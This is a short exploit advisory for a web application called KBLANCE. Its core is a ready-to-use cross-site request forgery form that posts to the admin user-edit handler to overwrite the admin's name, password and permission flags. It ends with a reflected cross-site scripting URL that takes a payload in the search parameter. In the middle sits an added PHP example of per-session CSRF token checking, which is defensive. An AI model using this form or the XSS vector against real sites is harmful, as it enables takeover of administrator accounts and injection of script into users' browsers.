KBLANCE | Xsrf
-----------------------------------------------------------------------------------------------------------
author : CWH1RLPOOL |Bug Researchers
-----------------------------------------------------------------------------------------------------------
info: Admin details can be changed.
-----------------------------------------------------------------------------------------------------------
<form name=asdf method=post action=http://www.site.com/[path]/admin/users/edit2.php onSubmit=return check();>
<input type=hidden name=uid value=2>
<input name=uname id=uname type=text value=admin size= style=width:250px; >
<input name=pwd type=password id=pwd style=width:250px; value=>
<input name=cpwd type=password id=cpwd style=width:250px; value=>
<input name=fname type=text id=fname style=width:250px; value=admin>
<input name=lname type=text id=lname style=width:250px; value=Shan>
<input name=email type=text id=email style=width:250px; value=[email protected]>
<input type=checkbox name=a1 id=a1 value=1>
<input type=checkbox name=a2 id=a2 value=1>
<input type=checkbox name=a3 id=a3 value=1>
<input type=checkbox name=a4 id=a4 value=1>
<input type=checkbox name=a5 id=a5 value=1>
<input type=checkbox name=a6 id=a6 value=1>
<input type=checkbox name=a7 id=a7 value=1>
<input type=checkbox name=a8 id=a8 value=1>
<input type=checkbox name=a9 id=a9 value=1>
<input type=checkbox name=a10 id=a10 value=1>
<input type=checkbox name=a11 id=a11 value=1>
<input type=checkbox name=a12 id=a12 value=1>
<input type=checkbox name=a13 id=a13 value=1>
<input type=checkbox name=a14 id=a14 value=1>
<input type=checkbox name=a15 id=a15 value=1>
<input type=checkbox name=a16 id=a16 value=1>
<input type=checkbox name=a17 id=a17 value=1>
<input type=checkbox name=a18 id=a18 value=1>
<input type=checkbox name=a19 id=a19 value=1>
<input type=checkbox name=a20 id=a20 value=1>
<input type=checkbox name=a21 id=a21 value=1>
<input type=checkbox name=a22 id=a22 value=1>
<input type=checkbox name=a23 id=a23 value=1>
<input type=submit name=submit value=Save>
<input type=button name=go value=Cancel onClick=window.open('index.php?main=users&sub=index','_self');>
</form>
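
The form above is accepted because the user-edit handler has nothing to tell a cross-site POST from one sent by the admin panel itself. The following is an added defensive example, not KBLANCE code, showing a per-session token check for such a handler; the function names, the `csrf_token` field and the HTTPS-only cookie are assumptions.

```php
<?php
declare(strict_types=1);
// Hypothetical helpers: none of these names come from the KBLANCE code base.

function csrf_start_session(): void
{
    // SameSite=Strict keeps the browser from attaching the session cookie
    // to a POST that originates on another site (assumes the site runs on HTTPS).
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

function csrf_token(): string
{
    // One unpredictable token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    // Emit this inside every state-changing form the admin panel renders.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_verify(array $post): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // Reject missing, non-string or mismatched tokens; compare in constant time.
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// In the script that saves the user record (the role edit2.php plays above):
csrf_start_session();
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_verify($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... the existing uid/uname/pwd update logic runs only past this point ...
}
```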
------------------------------------------------------------------------------------------------------------
KBLANCE | Cross Site Scripting Bug
http://www.site/[path]/index.php?main=search&sub=index&view=window&SearchWd=[Xsscode]
-------------------------------------------------------------------------------------